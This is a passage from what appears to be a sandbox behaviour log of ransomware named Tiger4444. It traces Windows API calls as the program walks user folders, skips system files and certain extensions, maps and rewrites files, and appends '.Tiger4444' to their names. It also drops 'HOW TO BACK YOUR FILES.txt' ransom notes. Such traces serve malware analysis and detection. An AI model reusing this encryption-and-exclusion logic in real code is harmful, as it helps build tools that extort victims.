hHeap=0xc50000) returned 1 [0045.379] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.379] CloseHandle (hObject=0x2c8) returned 1 [0045.379] CloseHandle (hObject=0x260) returned 1 [0045.381] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\wyauoDThVWGo4KOPbrPe.flv.Tiger4444") returned 82 [0045.381] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\wyauoDThVWGo4KOPbrPe.flv" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\zcgza_bmc\\wyauodthvwgo4kopbrpe.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\wyauoDThVWGo4KOPbrPe.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\zcgza_bmc\\wyauodthvwgo4kopbrpe.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.381] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=25344 | out: Addend=0xc6f980) returned 16594064 [0045.381] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4457 [0045.381] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a8e1c0, ftCreationTime.dwHighDateTime=0x1d4c62b, ftLastAccessTime.dwLowDateTime=0xfe36edb0, ftLastAccessTime.dwHighDateTime=0x1d4c72f, ftLastWriteTime.dwLowDateTime=0xfe36edb0, ftLastWriteTime.dwHighDateTime=0x1d4c72f, nFileSizeHigh=0x0, nFileSizeLow=0x62f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wyauoDThVWGo4KOPbrPe.flv", cAlternateFileName="WYAUOD~1.FLV")) returned 0 [0045.382] FindClose (in: hFindFile=0xc730c8 | out: hFindFile=0xc730c8) returned 1 [0045.382] lstrcpyW (in: lpString1=0x30aeb08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.382] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\zcgza_bmc\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.383] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.383] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.384] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.384] CloseHandle (hObject=0x260) returned 1 [0045.384] CloseHandle (hObject=0x2ac) returned 1 [0045.385] GetCurrentThreadId () returned 0xfa8 [0045.385] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0045.385] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Searches", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0045.385] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72f48 | out: hHeap=0xc50000) returned 1 [0045.385] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0045.385] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Searches" | out: lpString1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0045.385] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Searches", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0045.385] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Searches\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Searches\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Searches\\.BFC0E91B00AE8A0620D3" [0045.385] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Searches\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\searches\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.387] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.389] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.390] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.390] CloseHandle (hObject=0x2ac) returned 1 [0045.391] lstrlenW (lpString="C:\\Users\\FD1HVy\\Searches") returned 24 [0045.391] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.391] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Searches\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x801359b0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f48 [0045.391] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.391] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.391] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.391] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.391] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x801359b0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.391] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.391] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.391] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.391] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.391] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.391] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8010f5a6, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8010f5a6, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x801359b0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.391] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.391] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.391] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.391] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.391] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.391] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0045.391] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0045.392] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0045.392] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0045.392] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0045.392] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0045.392] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0045.392] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0045.392] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0045.392] lstrcpyW (in: lpString1=0x30aeada, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.392] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\desktop.ini", dwFileAttributes=0x22) returned 1 [0045.392] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\desktop.ini", dwFileAttributes=0x6) returned 1 [0045.392] lstrlenW (lpString="desktop.ini") returned 11 [0045.392] lstrlenW (lpString="Tiger4444") returned 9 [0045.392] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0045.392] lstrlenW (lpString=".dll") returned 4 [0045.392] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0045.392] lstrlenW (lpString=".lnk") returned 4 [0045.392] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0045.392] lstrlenW (lpString=".ini") returned 4 [0045.392] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0045.392] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x44269063, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44269063, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x44269063, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0045.392] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.393] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.393] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Tiger4444.exe") returned -1 [0045.393] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0045.393] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0045.393] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="windows") returned -1 [0045.393] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="bootmgr") returned 1 [0045.393] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="pagefile.sys") returned -1 [0045.393] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="boot") returned 1 [0045.393] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ids.txt") returned -1 [0045.393] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="NTUSER.DAT") returned -1 [0045.393] lstrcpyW (in: lpString1=0x30aeada, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0045.393] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms", dwFileAttributes=0x22) returned 1 [0045.394] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms", dwFileAttributes=0x3) returned 1 [0045.394] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0045.394] lstrlenW (lpString="Tiger4444") returned 9 [0045.394] lstrcmpiW (lpString1="search-ms", lpString2="Tiger4444") returned -1 [0045.394] lstrlenW (lpString=".dll") returned 4 [0045.394] lstrcmpiW (lpString1="h-ms", lpString2=".dll") returned 1 [0045.394] lstrlenW (lpString=".lnk") returned 4 [0045.394] lstrcmpiW (lpString1="h-ms", lpString2=".lnk") returned 1 [0045.394] lstrlenW (lpString=".ini") returned 4 [0045.394] lstrcmpiW (lpString1="h-ms", lpString2=".ini") returned 1 [0045.394] lstrlenW (lpString=".sys") returned 4 [0045.394] lstrcmpiW (lpString1="h-ms", lpString2=".sys") returned 1 [0045.394] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0045.394] GetLastError () returned 0x5 [0045.394] wsprintfA (in: param_1=0x30ad238, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms _CreateFile error 5\r\n") returned 75 [0045.394] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms _CreateFile error 5\r\n") returned 75 [0045.394] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.394] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8ad [0045.394] WriteFile (in: hFile=0x260, lpBuffer=0x30ad238*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x30abefc, lpOverlapped=0x0 | out: lpBuffer=0x30ad238*, lpNumberOfBytesWritten=0x30abefc*=0x4b, lpOverlapped=0x0) returned 1 [0045.396] CloseHandle (hObject=0x260) returned 1 [0045.397] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.397] CloseHandle (hObject=0x0) returned 0 [0045.397] CloseHandle (hObject=0xffffffff) returned 1 [0045.397] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x44242e24, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44242e24, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x44242e24, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Tiger4444.exe") returned -1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="windows") returned -1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="bootmgr") returned 1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="pagefile.sys") returned -1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="boot") returned 1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ids.txt") returned 1 [0045.397] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="NTUSER.DAT") returned -1 [0045.397] lstrcpyW (in: lpString1=0x30aeada, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0045.397] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x22) returned 1 [0045.397] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x3) returned 1 [0045.398] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0045.398] lstrlenW (lpString="Tiger4444") returned 9 [0045.398] lstrcmpiW (lpString1="search-ms", lpString2="Tiger4444") returned -1 [0045.398] lstrlenW (lpString=".dll") returned 4 [0045.398] lstrcmpiW (lpString1="h-ms", lpString2=".dll") returned 1 [0045.398] lstrlenW (lpString=".lnk") returned 4 [0045.398] lstrcmpiW (lpString1="h-ms", lpString2=".lnk") returned 1 [0045.398] lstrlenW (lpString=".ini") returned 4 [0045.398] lstrcmpiW (lpString1="h-ms", lpString2=".ini") returned 1 [0045.398] lstrlenW (lpString=".sys") returned 4 [0045.398] lstrcmpiW (lpString1="h-ms", lpString2=".sys") returned 1 [0045.398] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0045.398] GetLastError () returned 0x5 [0045.398] wsprintfA (in: param_1=0x30ad238, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms _CreateFile error 5\r\n") returned 82 [0045.398] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms _CreateFile error 5\r\n") returned 82 [0045.398] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.398] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f8 [0045.398] WriteFile (in: hFile=0x260, lpBuffer=0x30ad238*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x30abefc, lpOverlapped=0x0 | out: lpBuffer=0x30ad238*, lpNumberOfBytesWritten=0x30abefc*=0x52, lpOverlapped=0x0) returned 1 [0045.400] CloseHandle (hObject=0x260) returned 1 [0045.401] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.401] CloseHandle (hObject=0x0) returned 0 [0045.401] CloseHandle (hObject=0xffffffff) returned 1 [0045.402] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b71b019, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2b71b019, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2b71b019, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cAlternateFileName="WINRT-~1.SEA")) returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="Tiger4444.exe") returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2=".") returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="..") returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="windows") returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="bootmgr") returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="pagefile.sys") returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="boot") returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="ids.txt") returned 1 [0045.402] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="NTUSER.DAT") returned 1 [0045.402] lstrcpyW (in: lpString1=0x30aeada, lpString2="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" | out: lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" [0045.402] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", dwFileAttributes=0x0) returned 1 [0045.430] lstrlenW (lpString="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned 74 [0045.430] lstrlenW (lpString="Tiger4444") returned 9 [0045.430] lstrcmpiW (lpString1="nector-ms", lpString2="Tiger4444") returned -1 [0045.430] lstrlenW (lpString=".dll") returned 4 [0045.430] lstrcmpiW (lpString1="r-ms", lpString2=".dll") returned 1 [0045.430] lstrlenW (lpString=".lnk") returned 4 [0045.430] lstrcmpiW (lpString1="r-ms", lpString2=".lnk") returned 1 [0045.430] lstrlenW (lpString=".ini") returned 4 [0045.430] lstrcmpiW (lpString1="r-ms", lpString2=".ini") returned 1 [0045.430] lstrlenW (lpString=".sys") returned 4 [0045.430] lstrcmpiW (lpString1="r-ms", lpString2=".sys") returned 1 [0045.430] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.430] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.430] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13688348940) returned 1 [0045.430] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=855) returned 1 [0045.430] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0045.431] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0045.431] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x660, lpName=0x0) returned 0x2c8 [0045.432] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x660) returned 0xbe0000 [0045.449] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.449] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.449] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.449] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.449] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.449] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.449] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.449] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.449] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13690221098) returned 1 [0045.449] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0045.449] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0045.449] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.449] CloseHandle (hObject=0x2c8) returned 1 [0045.449] CloseHandle (hObject=0x260) returned 1 [0045.451] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.Tiger4444") returned 109 [0045.451] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms"), lpNewFileName="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.Tiger4444" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.tiger4444"), dwFlags=0x1) returned 1 [0045.451] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=864 | out: Addend=0xc6f980) returned 16619408 [0045.451] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=18 | out: Addend=0xc6f98c) returned 4458 [0045.451] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b71b019, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2b71b019, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2b71b019, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cAlternateFileName="WINRT-~1.SEA")) returned 0 [0045.451] FindClose (in: hFindFile=0xc72f48 | out: hFindFile=0xc72f48) returned 1 [0045.451] lstrcpyW (in: lpString1=0x30aeada, lpString2="HOW TO BACK YOUR FILES.txt" | 